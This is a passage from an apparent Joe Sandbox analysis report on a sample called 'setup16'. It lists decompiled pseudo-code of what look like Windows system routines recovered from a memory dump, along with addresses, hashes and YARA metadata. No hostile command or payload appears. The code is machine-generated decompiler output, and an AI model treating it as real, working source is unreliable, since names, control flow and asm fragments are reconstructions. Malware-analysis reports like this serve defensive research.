                                                                                                                                                                                                        0x04a435e6
                                                                                                                                                                                                        0x04a435e8
                                                                                                                                                                                                        0x04a435f5
                                                                                                                                                                                                        0x04a435fa
                                                                                                                                                                                                        0x04a43603
                                                                                                                                                                                                        0x04a43604
                                                                                                                                                                                                        0x04a43609
                                                                                                                                                                                                        0x04a4360a
                                                                                                                                                                                                        0x04a43612
                                                                                                                                                                                                        0x04a43613
                                                                                                                                                                                                        0x04a4361e
                                                                                                                                                                                                        0x04a43622
                                                                                                                                                                                                        0x04a43628
                                                                                                                                                                                                        0x04a4362f
                                                                                                                                                                                                        0x04a4362f
                                                                                                                                                                                                        0x04a43636
                                                                                                                                                                                                        0x04a43638
                                                                                                                                                                                                        0x04a4363b
                                                                                                                                                                                                        0x04a43642
                                                                                                                                                                                                        0x04a43642
                                                                                                                                                                                                        0x04a43636
                                                                                                                                                                                                        0x04a43657
                                                                                                                                                                                                        0x04a43657
                                                                                                                                                                                                        0x04a4365c
                                                                                                                                                                                                        0x04a43662
                                                                                                                                                                                                        0x04a43669
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: BinaryHash
                                                                                                                                                                                                        • API String ID: 0-2202222882
                                                                                                                                                                                                        • Opcode ID: 8437f6ba32561f9cc4ee3b568d71275d5175a9baf6de7032a5213ec1f4ef4e5b
                                                                                                                                                                                                        • Instruction ID: 3441475c23ad4e3d568f17d5ae432a6670f2ffea4c87079adf1c35b18550747c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8437f6ba32561f9cc4ee3b568d71275d5175a9baf6de7032a5213ec1f4ef4e5b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 404145F1D0152D9EEF21DA50DD80FEFB77CAB84718F0045A5AA08A7240DB70AE888F94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A905AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                                                        			E04A905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E04A907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04A09730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E04A8A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E04A8A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04A91293(_t79, _v40, E04A907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E049E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E04A8138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                                                                                                                        0x04a905c5
                                                                                                                                                                                                        0x04a905ca
                                                                                                                                                                                                        0x04a905d3
                                                                                                                                                                                                        0x04a906db
                                                                                                                                                                                                        0x04a906db
                                                                                                                                                                                                        0x04a906dd
                                                                                                                                                                                                        0x04a906e3
                                                                                                                                                                                                        0x04a906e3
                                                                                                                                                                                                        0x04a905dd
                                                                                                                                                                                                        0x04a905e7
                                                                                                                                                                                                        0x04a905f6
                                                                                                                                                                                                        0x04a90600
                                                                                                                                                                                                        0x04a90607
                                                                                                                                                                                                        0x04a90610
                                                                                                                                                                                                        0x04a90615
                                                                                                                                                                                                        0x04a9061a
                                                                                                                                                                                                        0x04a9061c
                                                                                                                                                                                                        0x04a9061e
                                                                                                                                                                                                        0x04a90624
                                                                                                                                                                                                        0x04a90625
                                                                                                                                                                                                        0x04a90627
                                                                                                                                                                                                        0x04a90628
                                                                                                                                                                                                        0x04a90631
                                                                                                                                                                                                        0x04a90640
                                                                                                                                                                                                        0x04a9064d
                                                                                                                                                                                                        0x04a90654
                                                                                                                                                                                                        0x04a90654
                                                                                                                                                                                                        0x04a90631
                                                                                                                                                                                                        0x04a9066d
                                                                                                                                                                                                        0x04a90674
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a90692
                                                                                                                                                                                                        0x04a9069e
                                                                                                                                                                                                        0x04a906b0
                                                                                                                                                                                                        0x04a906a0
                                                                                                                                                                                                        0x04a906a9
                                                                                                                                                                                                        0x04a906a9
                                                                                                                                                                                                        0x04a906b8
                                                                                                                                                                                                        0x04a906d6
                                                                                                                                                                                                        0x04a906d6
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: `
                                                                                                                                                                                                        • API String ID: 0-2679148245
                                                                                                                                                                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                                                                                                        • Instruction ID: f8d8afa61d43ed099f0625eec696176c4e7e42853cf1ade4c059b38799731c76
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8031B0726083456BEB20DF25CD45F9677D9EBC4798F044229BA54EB280E7B0FD04CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A43884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E04A43884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04A09650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L049E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04A09650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                                                                                                                        0x04a43893
                                                                                                                                                                                                        0x04a43896
                                                                                                                                                                                                        0x04a43899
                                                                                                                                                                                                        0x04a4389f
                                                                                                                                                                                                        0x04a438a0
                                                                                                                                                                                                        0x04a438a4
                                                                                                                                                                                                        0x04a438a9
                                                                                                                                                                                                        0x04a438ac
                                                                                                                                                                                                        0x04a438ad
                                                                                                                                                                                                        0x04a438ae
                                                                                                                                                                                                        0x04a438af
                                                                                                                                                                                                        0x04a438b1
                                                                                                                                                                                                        0x04a438b4
                                                                                                                                                                                                        0x04a438bb
                                                                                                                                                                                                        0x04a438bc
                                                                                                                                                                                                        0x04a438bd
                                                                                                                                                                                                        0x04a438c4
                                                                                                                                                                                                        0x04a438c8
                                                                                                                                                                                                        0x04a438ca
                                                                                                                                                                                                        0x04a438ca
                                                                                                                                                                                                        0x04a438d5
                                                                                                                                                                                                        0x04a4393e
                                                                                                                                                                                                        0x04a43940
                                                                                                                                                                                                        0x04a43942
                                                                                                                                                                                                        0x04a43952
                                                                                                                                                                                                        0x04a43954
                                                                                                                                                                                                        0x04a43961
                                                                                                                                                                                                        0x04a43961
                                                                                                                                                                                                        0x04a43967
                                                                                                                                                                                                        0x04a4396e
                                                                                                                                                                                                        0x04a4396e
                                                                                                                                                                                                        0x04a43947
                                                                                                                                                                                                        0x04a4394c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a4394c
                                                                                                                                                                                                        0x04a438ea
                                                                                                                                                                                                        0x04a438ee
                                                                                                                                                                                                        0x04a438f8
                                                                                                                                                                                                        0x04a438f9
                                                                                                                                                                                                        0x04a438ff
                                                                                                                                                                                                        0x04a43900
                                                                                                                                                                                                        0x04a43902
                                                                                                                                                                                                        0x04a43903
                                                                                                                                                                                                        0x04a4390b
                                                                                                                                                                                                        0x04a4390f
                                                                                                                                                                                                        0x04a43950
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a43950
                                                                                                                                                                                                        0x04a43915
                                                                                                                                                                                                        0x04a4391d
                                                                                                                                                                                                        0x04a4391d
                                                                                                                                                                                                        0x04a43922
                                                                                                                                                                                                        0x04a43926
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a43928
                                                                                                                                                                                                        0x04a4392b
                                                                                                                                                                                                        0x04a4392b
                                                                                                                                                                                                        0x04a43935
                                                                                                                                                                                                        0x04a43937
                                                                                                                                                                                                        0x04a43937
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a43935
                                                                                                                                                                                                        0x04a43926
                                                                                                                                                                                                        0x04a438f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: BinaryName
                                                                                                                                                                                                        • API String ID: 0-215506332
                                                                                                                                                                                                        • Opcode ID: 7dbab0d2caa6d092fc2a1d3a57dc7fd3f3db7f08b8919122527a8df4a13aca42
                                                                                                                                                                                                        • Instruction ID: dc5b2ab5bc5feca374b13598875f363577555349af054d0d0c88d558223127bf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dbab0d2caa6d092fc2a1d3a57dc7fd3f3db7f08b8919122527a8df4a13aca42
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E331F472E01509BFEF25DB99C955D7FB774EBC0B20F014169AD14A7682D630BE00C7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 33%
                                                                                                                                                                                                        			E049FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4abd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E049E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04A0B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04A098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04A095D0();
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                                                                                                        0x049fd29c
                                                                                                                                                                                                        0x049fd2a6
                                                                                                                                                                                                        0x049fd2b1
                                                                                                                                                                                                        0x049fd2b5
                                                                                                                                                                                                        0x049fd2b6
                                                                                                                                                                                                        0x049fd2bc
                                                                                                                                                                                                        0x049fd2bd
                                                                                                                                                                                                        0x049fd2be
                                                                                                                                                                                                        0x049fd2bf
                                                                                                                                                                                                        0x049fd2c2
                                                                                                                                                                                                        0x049fd2c4
                                                                                                                                                                                                        0x049fd2cc
                                                                                                                                                                                                        0x049fd384
                                                                                                                                                                                                        0x049fd34b
                                                                                                                                                                                                        0x049fd34f
                                                                                                                                                                                                        0x049fd350
                                                                                                                                                                                                        0x049fd351
                                                                                                                                                                                                        0x049fd35c
                                                                                                                                                                                                        0x049fd35c
                                                                                                                                                                                                        0x049fd2d6
                                                                                                                                                                                                        0x049fd2da
                                                                                                                                                                                                        0x049fd2e1
                                                                                                                                                                                                        0x049fd361
                                                                                                                                                                                                        0x049fd369
                                                                                                                                                                                                        0x049fd36d
                                                                                                                                                                                                        0x049fd2e3
                                                                                                                                                                                                        0x049fd2e3
                                                                                                                                                                                                        0x049fd2e3
                                                                                                                                                                                                        0x049fd2e5
                                                                                                                                                                                                        0x049fd2ed
                                                                                                                                                                                                        0x049fd2f5
                                                                                                                                                                                                        0x049fd2fa
                                                                                                                                                                                                        0x049fd302
                                                                                                                                                                                                        0x049fd303
                                                                                                                                                                                                        0x049fd30b
                                                                                                                                                                                                        0x049fd30f
                                                                                                                                                                                                        0x049fd313
                                                                                                                                                                                                        0x049fd318
                                                                                                                                                                                                        0x049fd31c
                                                                                                                                                                                                        0x049fd320
                                                                                                                                                                                                        0x049fd379
                                                                                                                                                                                                        0x049fd37d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3affe
                                                                                                                                                                                                        0x04a3b001
                                                                                                                                                                                                        0x04a3b011
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fd322
                                                                                                                                                                                                        0x049fd322
                                                                                                                                                                                                        0x049fd330
                                                                                                                                                                                                        0x049fd337
                                                                                                                                                                                                        0x049fd35d
                                                                                                                                                                                                        0x049fd339
                                                                                                                                                                                                        0x049fd33f
                                                                                                                                                                                                        0x049fd38c
                                                                                                                                                                                                        0x049fd38c
                                                                                                                                                                                                        0x049fd33f
                                                                                                                                                                                                        0x049fd349
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049fd349

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                                                        • Opcode ID: caebdcce3450981d77b4f828a6eeba2eea1fcb329f8309750ba846f5a2115694
                                                                                                                                                                                                        • Instruction ID: d523eee90dda8d77b91afac5a32930d232019b7d76966bf06449c455b49d455c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: caebdcce3450981d77b4f828a6eeba2eea1fcb329f8309750ba846f5a2115694
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A93195B25083059FD711DF28D98096BBBE8FBC5758F000A3EF69583250E679ED04DB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049D1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E049D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E04A0BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E04A0A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E04A0A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L049E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                                                                                                                        0x049d1b8f
                                                                                                                                                                                                        0x049d1b9a
                                                                                                                                                                                                        0x049d1b9c
                                                                                                                                                                                                        0x049d1b9e
                                                                                                                                                                                                        0x049d1ba3
                                                                                                                                                                                                        0x04a27010
                                                                                                                                                                                                        0x04a27010
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d1ba9
                                                                                                                                                                                                        0x049d1ba9
                                                                                                                                                                                                        0x049d1bae
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d1bc5
                                                                                                                                                                                                        0x049d1bca
                                                                                                                                                                                                        0x049d1bcf
                                                                                                                                                                                                        0x049d1bd0
                                                                                                                                                                                                        0x049d1bd1
                                                                                                                                                                                                        0x049d1bd2
                                                                                                                                                                                                        0x049d1bd6
                                                                                                                                                                                                        0x049d1bdc
                                                                                                                                                                                                        0x049d1be0
                                                                                                                                                                                                        0x04a26ffc
                                                                                                                                                                                                        0x04a27000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a27006
                                                                                                                                                                                                        0x04a27009
                                                                                                                                                                                                        0x04a27009
                                                                                                                                                                                                        0x049d1be6
                                                                                                                                                                                                        0x049d1bec
                                                                                                                                                                                                        0x049d1c0b
                                                                                                                                                                                                        0x049d1c0b
                                                                                                                                                                                                        0x049d1c0c
                                                                                                                                                                                                        0x049d1c11
                                                                                                                                                                                                        0x049d1c12
                                                                                                                                                                                                        0x049d1c15
                                                                                                                                                                                                        0x049d1c1b
                                                                                                                                                                                                        0x049d1c1f
                                                                                                                                                                                                        0x049d1c31
                                                                                                                                                                                                        0x049d1c33
                                                                                                                                                                                                        0x04a27026
                                                                                                                                                                                                        0x04a27026
                                                                                                                                                                                                        0x049d1c21
                                                                                                                                                                                                        0x049d1c24
                                                                                                                                                                                                        0x049d1c24
                                                                                                                                                                                                        0x049d1bee
                                                                                                                                                                                                        0x049d1bee
                                                                                                                                                                                                        0x049d1bf2
                                                                                                                                                                                                        0x049d1c3a
                                                                                                                                                                                                        0x049d1bf4
                                                                                                                                                                                                        0x049d1bf4
                                                                                                                                                                                                        0x049d1c05
                                                                                                                                                                                                        0x049d1c05
                                                                                                                                                                                                        0x049d1c09
                                                                                                                                                                                                        0x049d1c3e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049d1c09
                                                                                                                                                                                                        0x049d1bec
                                                                                                                                                                                                        0x049d1be0
                                                                                                                                                                                                        0x049d1bae
                                                                                                                                                                                                        0x049d1c2e

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: WindowsExcludedProcs
                                                                                                                                                                                                        • API String ID: 0-3583428290
                                                                                                                                                                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                                                                                        • Instruction ID: f5db86209aa672522d944675630247a3adeb6632b8f8731981999cb4e3f899be
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23219877601228ABDB219FA9CA41F6B776DAF85754F058475F9049B200D634FD04A7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049EF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                                                                                                                        0x049ef71d
                                                                                                                                                                                                        0x049ef722
                                                                                                                                                                                                        0x049ef726
                                                                                                                                                                                                        0x04a34770
                                                                                                                                                                                                        0x049ef765
                                                                                                                                                                                                        0x049ef769
                                                                                                                                                                                                        0x049ef769
                                                                                                                                                                                                        0x049ef732
                                                                                                                                                                                                        0x04a3477a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3477a
                                                                                                                                                                                                        0x049ef738
                                                                                                                                                                                                        0x049ef73a
                                                                                                                                                                                                        0x049ef73c
                                                                                                                                                                                                        0x049ef73f
                                                                                                                                                                                                        0x049ef746
                                                                                                                                                                                                        0x049ef778
                                                                                                                                                                                                        0x049ef7a9
                                                                                                                                                                                                        0x049ef7a9
                                                                                                                                                                                                        0x049ef754
                                                                                                                                                                                                        0x049ef75a
                                                                                                                                                                                                        0x049ef75d
                                                                                                                                                                                                        0x049ef75f
                                                                                                                                                                                                        0x049ef761
                                                                                                                                                                                                        0x049ef76f
                                                                                                                                                                                                        0x049ef771
                                                                                                                                                                                                        0x049ef771
                                                                                                                                                                                                        0x049ef76f
                                                                                                                                                                                                        0x049ef763
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ef763
                                                                                                                                                                                                        0x049ef77d
                                                                                                                                                                                                        0x049ef7a3
                                                                                                                                                                                                        0x049ef7a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ef7a5
                                                                                                                                                                                                        0x049ef77f
                                                                                                                                                                                                        0x049ef782
                                                                                                                                                                                                        0x049ef784
                                                                                                                                                                                                        0x049ef786
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ef788
                                                                                                                                                                                                        0x049ef748
                                                                                                                                                                                                        0x049ef74d
                                                                                                                                                                                                        0x049ef78d
                                                                                                                                                                                                        0x049ef793
                                                                                                                                                                                                        0x049ef7b7
                                                                                                                                                                                                        0x049ef7bc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ef7bc
                                                                                                                                                                                                        0x049ef798
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ef79d
                                                                                                                                                                                                        0x049ef7b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ef7b0
                                                                                                                                                                                                        0x049ef79f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ef74f
                                                                                                                                                                                                        0x049ef74f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ef74f

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
